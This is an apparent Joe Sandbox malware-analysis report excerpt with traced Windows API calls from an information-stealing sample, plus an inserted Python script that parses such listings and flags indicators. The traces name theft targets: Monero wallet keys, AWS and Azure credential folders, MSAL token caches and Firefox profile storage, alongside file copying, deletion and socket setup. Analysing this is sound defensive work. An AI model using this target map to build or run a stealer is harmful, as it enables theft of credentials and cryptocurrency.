                                • Opcode Fuzzy Hash: 785781458f8d28df55a723180428c604c2c60ab9d3510bc68693a52667853a1c
                                • Instruction Fuzzy Hash: 4231D4B240C708EFD715BF29E8856BAFBE4EF18310F02491DD6D582650E7355440DB87
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 006D86AA
                                • StrStrA.SHLWAPI(?,00F201D8), ref: 006D86CF
                                • lstrcpyn.KERNEL32(008F93D0,?,00000000), ref: 006D86EE
                                • lstrlen.KERNEL32(?), ref: 006D8701
                                • wsprintfA.USER32 ref: 006D8711
                                • lstrcpy.KERNEL32(?,?), ref: 006D8727
                                • StrStrA.SHLWAPI(?,00F20208), ref: 006D8754
                                • lstrcpy.KERNEL32(?,008F93D0), ref: 006D87B4
                                • StrStrA.SHLWAPI(?,00F204D8), ref: 006D87E1
                                • lstrcpyn.KERNEL32(008F93D0,?,00000000), ref: 006D8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 9edc4ab344c33dfad473d258bf415c8b56828acdc46b454aa61048d8b12d8e22
                                • Instruction ID: 1e4d1baf95d5d657e1ade41a4324f72018780214df172a7fec1c1ec0f82cfbf2
                                • Opcode Fuzzy Hash: 9edc4ab344c33dfad473d258bf415c8b56828acdc46b454aa61048d8b12d8e22
                                • Instruction Fuzzy Hash: 56F10672901618EFCB10DB74DD48EAAB7BAFB88300F144599E949E7350DF70AE45CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1F9F
                                • lstrlen.KERNEL32(00F18A10), ref: 006C1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1FE3
                                • lstrlen.KERNEL32(006F1794), ref: 006C1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C200E
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C204D
                                • lstrlen.KERNEL32(006F1794), ref: 006C2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2075
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C20AC
                                • lstrlen.KERNEL32(?), ref: 006C20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2104
                                • lstrcat.KERNEL32(00000000,?), ref: 006C2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2139
                                • lstrlen.KERNEL32(006F1794), ref: 006C214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C216B
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C21D4
                                • lstrlen.KERNEL32(?), ref: 006C21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C220A
                                • lstrcat.KERNEL32(00000000,?), ref: 006C2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2242
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C227F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006C228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C22B1
                                • lstrcat.KERNEL32(00000000,00F1EFF0), ref: 006C22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C22F7
                                • lstrcat.KERNEL32(00000000), ref: 006C2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006C2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 006C23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006C2444
                                • FindClose.KERNEL32(00000000), ref: 006C2453
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 74c6fe96699640eaea0685292ed80631803627b1d70d6378d9120f3883b2ab8d
                                • Instruction ID: bed1aad86ed9c38e392b8b1fdd48e7ec58ead7af6a347047d686d4ef7c80253e
                                • Opcode Fuzzy Hash: 74c6fe96699640eaea0685292ed80631803627b1d70d6378d9120f3883b2ab8d
                                • Instruction Fuzzy Hash: 6AE11471A1161B9BCB61ABA6D899FBE77AAEF44300F04402CFD09A7211DF34DD45CBA4
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6445
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006D64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: 7063ca53a4bd4bdf696b9c72e37d7a4debf9c15a8d7c2ec0ac1838efb29239f5
                                • Instruction ID: 8012edc281df3ebe7c0cd60411cc81159a4328a8898858c2c0ca125366b82b91
                                • Opcode Fuzzy Hash: 7063ca53a4bd4bdf696b9c72e37d7a4debf9c15a8d7c2ec0ac1838efb29239f5
                                • Instruction Fuzzy Hash: E3F16870E116069BCB21AF7AD859FBE77A6AF44300F04802EF84AD7351DB38D846CB95
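                                 Taken together, the two function entries above describe one collection routine: the function at 006D6445 resolves a known folder with SHGetFolderPathA (csidl 0x1A is CSIDL_APPDATA, i.e. %APPDATA%) and carries the literal "\..\" to step out of it, and the function at 006C1F9F walks a directory with FindNextFileA, copying entries with CopyFileA and removing them again with DeleteFileA. The following Python script is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the report's "APIs" and "String ID" bullet lines into structured calls, decodes the CSIDL argument, and tags the indicators that a practitioner would pull out of this listing. The sample listing is constructed from lines copied from this page; the indicator names, the CSIDL table (from shlobj.h) and the reading of "\storage\default\" plus ".metadata-v2" as the per-origin storage layout of Firefox profiles are the example's own.

```python
"""Added example: parse Joe Sandbox 'APIs' / 'String ID' bullet lines into
structured calls and flag the browser-data collection pattern on this page.
The indicator names and the CSIDL table are the example's own, not the report's."""
import re
from dataclasses import dataclass

# Constructed sample: bullet lines copied from the function listings on this page.
SAMPLE_LISTING = r"""
• lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6445
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006D64AA
• lstrcat.KERNEL32(00000000,00000000), ref: 006D650E
• String ID: \..\
• lstrlen.KERNEL32(\storage\default\), ref: 006D4414
• lstrcat.KERNEL32(00000000,.metadata-v2), ref: 006D4547
• GetFileAttributesA.KERNEL32(00000000), ref: 006D45A7
• wsprintfA.USER32 ref: 006D8711
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006C2356
• DeleteFileA.KERNEL32(00000000), ref: 006C23F7
• FindNextFileA.KERNEL32(00000000,?), ref: 006C2444
• FindClose.KERNEL32(00000000), ref: 006C2453
"""

# "• api.MODULE(arg,arg,...), ref: ADDR": the argument list is optional
# (wsprintfA is listed without one) and so is the comma before "ref:".
API_RE = re.compile(
    r"^(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_RE = re.compile(r"^(?:•\s*)?String ID:\s*(?P<s>.*?)\s*$")

# CSIDL values from shlobj.h; only the folders a credential stealer usually resolves.
CSIDL = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int          # call-site address, as printed after "ref:"


def parse_listing(text):
    """Return (calls, strings) parsed from the bullet lines of one function entry."""
    calls, strings = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
            continue
        m = STRING_RE.match(line)
        if m and m.group("s"):
            strings.append(m.group("s"))
    return calls, strings


def csidl_name(call):
    """Decode the csidl argument of SHGetFolderPathA(hwnd, csidl, hToken, dwFlags, pszPath)."""
    if call.api != "SHGetFolderPathA" or len(call.args) < 2:
        return None
    try:
        value = int(call.args[1], 16)
    except ValueError:                      # the sandbox prints "?" for unresolved values
        return None
    value &= 0xFF                           # drop CSIDL_FLAG_* bits (0x8000, 0x4000, ...)
    return CSIDL.get(value, f"CSIDL_0x{value:02X}")


def indicators(calls, strings):
    """Name the behaviours visible in the listing (labels are this example's own)."""
    apis = {c.api for c in calls}
    literals = list(strings) + [a for c in calls for a in c.args]
    found = set()
    for c in calls:
        name = csidl_name(c)
        if name in ("CSIDL_APPDATA", "CSIDL_LOCAL_APPDATA"):
            found.add("resolves_" + name.lower())
    if any(lit == "\\..\\" for lit in literals):
        found.add("parent_dir_traversal")     # climbs out of the resolved folder
    if any("\\storage\\default\\" in lit or lit.endswith(".metadata-v2") for lit in literals):
        found.add("firefox_storage_default")  # <profile>\storage\default\<origin>\.metadata-v2
    if {"FindNextFileA", "CopyFileA"} <= apis:
        found.add("enumerate_and_copy_files")
    if "DeleteFileA" in apis:
        found.add("deletes_files")
    return found


def summarize(text):
    """Parse a listing and return its indicators, sorted, for reporting."""
    calls, strings = parse_listing(text)
    return sorted(indicators(calls, strings))


if __name__ == "__main__":
    for tag in summarize(SAMPLE_LISTING):
        print(tag)
```

                                 Paste further "APIs" blocks from the report into the listing to extend the sweep. Most arguments in these listings are printed as 00000000 or "?" because the value was not resolved at trace time, so the string-based indicators come mainly from the "String ID" lines and the few literals the sandbox could recover, such as "\storage\default\" above; the API-combination indicators do not depend on argument resolution.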
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D43A3
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 006D4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 006D443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 006D44DF
                                • lstrlen.KERNEL32(006F1794), ref: 006D44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4507
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 006D451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 006D4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006D45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D467B
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 79fd6d2561a8769e14c155237c7c917eb96e7777ff31312db4d35a532d2dbd06
                                • Instruction ID: b3860e9f2dc3405a1509b79e49e006771343ca258eaa96f2e08809485b575b3b
                                • Opcode Fuzzy Hash: 79fd6d2561a8769e14c155237c7c917eb96e7777ff31312db4d35a532d2dbd06
                                • Instruction Fuzzy Hash: 21B14471A116169BCB21AFBAD959FBE76AAEF44300F04002DF84AE7351DF34ED418B94
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006D5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D58F8
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5988
                                • lstrlen.KERNEL32(006F1794), ref: 006D599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D59B9
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D59C5
                                • lstrlen.KERNEL32(00F1F020), ref: 006D59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006D5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5BB5
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5C70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 441d78f11ba7ee55af1dc1d70c16b39f726a0ef24c3ce0b940d8e63ab7abec9f
                                • Instruction ID: d7c7f2a11ffac16a027ef30096b47515ebaed3c1a4cdfae3eb51b6e08868ab20
                                • Opcode Fuzzy Hash: 441d78f11ba7ee55af1dc1d70c16b39f726a0ef24c3ce0b940d8e63ab7abec9f
                                • Instruction Fuzzy Hash: E2027971E11A169BCB21AFA9C899EBE7BB6EF44300F04412EF84A97750DB34DC41CB94
                                APIs
                                  • Part of subcall function 006C1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C1135
                                  • Part of subcall function 006C1120: RtlAllocateHeap.NTDLL(00000000), ref: 006C113C
                                  • Part of subcall function 006C1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006C1159
                                  • Part of subcall function 006C1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006C1173
                                  • Part of subcall function 006C1120: RegCloseKey.ADVAPI32(?), ref: 006C117D
                                • lstrcat.KERNEL32(?,00000000), ref: 006C11C0
                                • lstrlen.KERNEL32(?), ref: 006C11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 006C11E8
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C121F
                                • lstrlen.KERNEL32(00F18A10), ref: 006C122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1251
                                • lstrcat.KERNEL32(00000000,00F18A10), ref: 006C1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 006C1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 006C1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C12BA
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C12FF
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006C130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1335
                                • lstrcat.KERNEL32(00000000,?), ref: 006C133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1378
                                • lstrcat.KERNEL32(00000000), ref: 006C1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006C13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C143D
                                  • Part of subcall function 006DEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006DEE12
                                • DeleteFileA.KERNEL32(?), ref: 006C1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 1f1e1a4dec89528a17e3a03b04119b7ba285dc1d29cd7f4747157dc0de3549ce
                                • Instruction ID: 2ef195c54b46c30050ea3b7246228d5a1f405f53b5098ac6253bbb53db1ba163
                                • Opcode Fuzzy Hash: 1f1e1a4dec89528a17e3a03b04119b7ba285dc1d29cd7f4747157dc0de3549ce
                                • Instruction Fuzzy Hash: 09A13A71A106069BCB21ABB5DC59FBE77BAEF46310F04402CF949EB252DF34DA418B94
                                APIs
                                • memset.MSVCRT ref: 006DE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006DE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 006DE7C6
                                • memset.MSVCRT ref: 006DE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006DE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 006DE886
                                • memset.MSVCRT ref: 006DE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006DE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE920
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006DE947
                                • memset.MSVCRT ref: 006DE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: fbf4296076170a2cf98a5e958f4130f0938ade5610daee0655d2339316d2613a
                                • Instruction ID: a0312ef2238ebd8b048cb31fe47258dcb62a40a7369c89c7b4706d3f06945a99
                                • Opcode Fuzzy Hash: fbf4296076170a2cf98a5e958f4130f0938ade5610daee0655d2339316d2613a
                                • Instruction Fuzzy Hash: BF71C471E50219ABDB61EBB4DC46FFD7375EF88700F4104ACBB199B281DE709A848B58
                                APIs
                                • lstrcpy.KERNEL32 ref: 006DABCF
                                • lstrlen.KERNEL32(00F20280), ref: 006DABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DACB7
                                • lstrlen.KERNEL32(006F4AD4), ref: 006DACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DACF3
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006DACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAD28
                                • lstrlen.KERNEL32(006F4AD4), ref: 006DAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAD5C
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006DAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAD91
                                • lstrlen.KERNEL32(00F203E8), ref: 006DADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAE6F
                                • lstrlen.KERNEL32(00000000), ref: 006DAE85
                                • lstrcpy.KERNEL32(00000000,00F203A0), ref: 006DAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: b5aac26c25e4960452379453feab79a57e0c4c4a3db003e157a6e80d1e0c7c8b
                                • Instruction ID: acb7a46c7161ffaeb0c4b9810769f2a92f00bc0a39a1762bc0fe4056693e27dd
                                • Opcode Fuzzy Hash: b5aac26c25e4960452379453feab79a57e0c4c4a3db003e157a6e80d1e0c7c8b
                                • Instruction Fuzzy Hash: 68B144709156169BCB22ABAADC48FBEB7BBFF40300F04052AA85997351DF34DD41CB96
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,006D72A4), ref: 006E47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 006E47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 006E480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 006E481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 006E482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 006E4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 006E4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 006E4862
